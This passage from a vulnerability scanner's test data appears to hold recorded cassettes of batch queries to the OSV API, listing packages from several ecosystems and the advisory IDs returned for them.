"4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/when_an_explicit_parse-as_is_given,_it's_applied_to_that_file url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 189 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] }, {}, {} ] } headers: Content-Length: - "189" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_MoreLockfiles.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 774 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Hackage", "name": "AC-Angle" }, "version": "1.0" }, { "package": { "ecosystem": "Hackage", "name": "ALUT" }, "version": "2.4.0.3" }, { "package": { "ecosystem": "Hackage", "name": "ANum" }, "version": "0.2.0.2" }, { "package": { "ecosystem": "Hackage", "name": "Agda" }, "version": "2.6.4.3" }, { "package": { "ecosystem": "Hackage", "name": "Allure" }, "version": "0.11.0.0" }, { "package": { "ecosystem": "Hackage", "name": "biscuit-haskell" }, "version": "0.3.0.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/cabal.project.freeze url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 105 body: | { "results": [ {}, {}, {}, {}, {}, { "vulns": [ { "id": "HSEC-2024-0009", "modified": "2025-11-14T18:15:43.110342Z" } ] } ] } headers: Content-Length: - "105" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 571 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "NuGet", "name": "AWSSDK.Core" }, "version": "3.7.10.6" }, { "package": { "ecosystem": "NuGet", "name": "Microsoft.Extensions.DependencyInjection" }, "version": "6.0.0" }, { "package": { "ecosystem": "NuGet", "name": "System.Linq.Dynamic.Core" }, "version": "1.3.7" }, { "package": { "ecosystem": "NuGet", "name": "TestLibrary" }, "version": "1.0.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/depsjson url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 104 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-4cv2-4hjh-77rx", "modified": "2025-01-27T19:00:52.634361Z" } ] }, {} ] } headers: Content-Length: - "104" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3215 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "async" }, "version": "2.23.0" }, { "package": { "ecosystem": "RubyGems", "name": "async-dns" }, "version": "1.4.1" }, { "package": { "ecosystem": "RubyGems", "name": "async-http" }, "version": "0.87.0" }, { "package": { "ecosystem": "RubyGems", "name": "async-pool" }, "version": "0.10.3" }, { "package": { "ecosystem": "RubyGems", "name": "console" }, "version": "1.29.2" }, { "package": { "ecosystem": "RubyGems", "name": "fiber-annotation" }, "version": "0.2.0" }, { "package": { "ecosystem": "RubyGems", "name": "fiber-local" }, "version": "1.1.0" }, { "package": { "ecosystem": "RubyGems", "name": "fiber-storage" }, "version": "1.0.0" }, { "package": { "ecosystem": "RubyGems", "name": "geoip" }, "version": "1.6.4" }, { "package": { "ecosystem": "RubyGems", "name": "io-endpoint" }, "version": "0.15.1" }, { "package": { "ecosystem": "RubyGems", "name": "io-event" }, "version": "1.9.0" }, { "package": { "ecosystem": "RubyGems", "name": "io-stream" }, "version": "0.6.1" }, { "package": { "ecosystem": "RubyGems", "name": "json" }, "version": "2.10.1" }, { "package": { "ecosystem": "RubyGems", "name": "metrics" }, "version": "0.12.1" }, { "package": { "ecosystem": "RubyGems", "name": "nokogiri" }, "version": "1.18.2" }, { "package": { "ecosystem": "RubyGems", "name": "process-daemon" }, "version": "1.0.1" }, { "package": { "ecosystem": "RubyGems", "name": "protocol-hpack" }, "version": "1.5.1" }, { "package": { "ecosystem": "RubyGems", "name": "protocol-http" }, "version": "0.49.0" }, { "package": { "ecosystem": "RubyGems", "name": "protocol-http1" }, "version": "0.30.0" }, { "package": { "ecosystem": "RubyGems", "name": "protocol-http2" }, "version": "0.22.1" }, { "package": { "ecosystem": "RubyGems", "name": "racc" }, "version": "1.8.1" }, { "package": { "ecosystem": "RubyGems", "name": "rainbow" }, "version": "2.2.2" }, { "package": { "ecosystem": "RubyGems", "name": "rake" }, "version": "13.2.1" }, { "package": { "ecosystem": "RubyGems", "name": "rubydns" }, "version": "2.0.2" }, { "package": { "ecosystem": "RubyGems", "name": "traces" }, "version": "0.15.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/gems.locked url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 526 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-9m3q-rhmv-5q44", "modified": "2026-02-04T03:22:18.343631Z" } ] }, {}, { "vulns": [ { "id": "GHSA-353f-x4gh-cqq8", "modified": "2026-02-04T03:08:45.682451Z" }, { "id": "GHSA-5w6v-399v-w3cc", "modified": "2026-02-04T02:49:28.572138Z" }, { "id": "GHSA-mrxw-mxhj-p664", "modified": "2026-02-04T04:34:58.905946Z" }, { "id": "GHSA-vvfq-8hwr-qm4m", "modified": "2026-02-04T03:58:31.466756Z" }, { "id": "GHSA-wx95-c6cv-8532", "modified": "2026-02-25T10:44:01.279701Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "526" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 325 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "NuGet", "name": "Microsoft.CodeDom.Providers.DotNetCompilerPlatform" }, "version": "1.0.0" }, { "package": { "ecosystem": "NuGet", "name": "Microsoft.Net.Compilers" }, "version": "1.0.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/packages.config url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 153 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "NuGet", "name": "Newtonsoft.Json" }, "version": "13.0.3" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/packages.lock.json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 536 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Hackage", "name": "fuzzyset" }, "version": "0.2.4" }, { "package": { "ecosystem": "Hackage", "name": "hasql-pool" }, "version": "1.0.1" }, { "package": { "ecosystem": "Hackage", "name": "jose-jwt" }, "version": "0.10.0" }, { "package": { "ecosystem": "Hackage", "name": "postgresql-libpq" }, "version": "0.10.1.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/stack.yaml.lock url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 265 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "emoji" }, "version": "2.14.0" }, { "package": { "ecosystem": "PyPI", "name": "protobuf" }, "version": "4.25.5" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/uv.lock url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 168 body: | { "results": [ {}, { "vulns": [ { "id": "GHSA-7gcm-g887-7qv7", "modified": "2026-02-05T16:35:34.839005Z" }, { "id": "GHSA-8qvm-5x2c-j2w7", "modified": "2026-02-04T03:00:07.684118Z" } ] } ] } headers: Content-Length: - "168" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_Transitive.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 9305 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "com.android.support:animated-vector-drawable" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:appcompat-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:mediarouter-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:palette-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-annotations" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-v4" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-vector-drawable" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-ads" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-ads-lite" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-analytics" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-analytics-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-appinvite" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-auth" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-auth-base" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-awareness" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-base" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-basement" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-cast" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-cast-framework" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-clearcut" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-drive" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-fitness" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-games" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-gass" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-gcm" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-identity" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-iid" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-instantapps" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-location" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-maps" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-nearby" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-panorama" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-places" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-plus" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-safetynet" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager-api" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager-v4-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tasks" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-vision" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-wallet" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-wearable" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-analytics" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-analytics-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-appindexing" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-auth" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-common" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-config" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-crash" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-database" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-database-connection" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-iid" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-messaging" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-storage" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-storage-common" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-api" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-web" }, "version": "2.14.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_multiple_registries url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 628 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-cm6r-892j-jv2g", "modified": "2023-11-08T04:08:28.014834Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-7rjr-3q55-vv33", "modified": "2025-10-22T19:37:53.742023Z" }, { "id": "GHSA-8489-44mv-ggj8", "modified": "2025-05-09T13:12:38.923602Z" }, { "id": "GHSA-jfh8-c2jp-5v3q", "modified": "2025-10-22T19:37:02.616807Z" }, { "id": "GHSA-p6xc-xr62-6r2g", "modified": "2025-05-09T13:12:54.089856Z" }, { "id": "GHSA-vc5p-v9hr-52mj", "modified": "2026-02-04T03:10:00.616806Z" } ] }, {} ] } headers: Content-Length: - "628" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 172 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-web" }, "version": "2.14.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_no_resolve_no_transitive url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 286 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "junit:junit" }, "version": "4.12" }, { "package": { "ecosystem": "Maven", "name": "org.hamcrest:hamcrest-core" }, "version": "1.3" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_non_utf8_encoding url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 98 body: | { "results": [ { "vulns": [ { "id": "GHSA-269g-pwp5-87pp", "modified": "2026-03-13T22:15:22.410895Z" } ] }, {} ] } headers: Content-Length: - "98" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 473 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-api" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-web" }, "version": "2.14.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_transitive_default url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 381 body: | { "results": [ {}, { "vulns": [ { "id": "GHSA-7rjr-3q55-vv33", "modified": "2025-10-22T19:37:53.742023Z" }, { "id": "GHSA-8489-44mv-ggj8", "modified": "2025-05-09T13:12:38.923602Z" }, { "id": "GHSA-jfh8-c2jp-5v3q", "modified": "2025-10-22T19:37:02.616807Z" }, { "id": "GHSA-p6xc-xr62-6r2g", "modified": "2025-05-09T13:12:54.089856Z" }, { "id": "GHSA-vc5p-v9hr-52mj", "modified": "2026-02-04T03:10:00.616806Z" } ] }, {} ] } headers: Content-Length: - "381" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 473 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-api" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-web" }, "version": "2.14.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_transitive_explicit_lockfile url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 381 body: | { "results": [ {}, { "vulns": [ { "id": "GHSA-7rjr-3q55-vv33", "modified": "2025-10-22T19:37:53.742023Z" }, { "id": "GHSA-8489-44mv-ggj8", "modified": "2025-05-09T13:12:38.923602Z" }, { "id": "GHSA-jfh8-c2jp-5v3q", "modified": "2025-10-22T19:37:02.616807Z" }, { "id": "GHSA-p6xc-xr62-6r2g", "modified": "2025-05-09T13:12:54.089856Z" }, { "id": "GHSA-vc5p-v9hr-52mj", "modified": "2026-02-04T03:10:00.616806Z" } ] }, {} ] } headers: Content-Length: - "381" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 9305 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "com.android.support:animated-vector-drawable" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:appcompat-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:mediarouter-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:palette-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-annotations" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-v4" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-vector-drawable" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-ads" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-ads-lite" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-analytics" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-analytics-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-appinvite" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-auth" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-auth-base" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-awareness" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-base" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-basement" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-cast" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-cast-framework" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-clearcut" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-drive" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-fitness" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-games" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-gass" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-gcm" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-identity" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-iid" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-instantapps" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-location" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-maps" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-nearby" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-panorama" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-places" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-plus" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-safetynet" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager-api" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager-v4-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tasks" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-vision" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-wallet" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-wearable" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-analytics" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-analytics-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-appindexing" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-auth" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-common" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-config" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-crash" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-database" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-database-connection" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-iid" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-messaging" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-storage" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-storage-common" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-api" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-web" }, "version": "2.14.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_transitive_native_source url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 628 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-cm6r-892j-jv2g", "modified": "2023-11-08T04:08:28.014834Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-7rjr-3q55-vv33", "modified": "2025-10-22T19:37:53.742023Z" }, { "id": "GHSA-8489-44mv-ggj8", "modified": "2025-05-09T13:12:38.923602Z" }, { "id": "GHSA-jfh8-c2jp-5v3q", "modified": "2025-10-22T19:37:02.616807Z" }, { "id": "GHSA-p6xc-xr62-6r2g", "modified": "2025-05-09T13:12:54.089856Z" }, { "id": "GHSA-vc5p-v9hr-52mj", "modified": "2026-02-04T03:10:00.616806Z" } ] }, {} ] } headers: Content-Length: - "628" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 386 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/requirements.txt_no_resolve_no_transitive url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 1081 body: | { "results": [ { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": 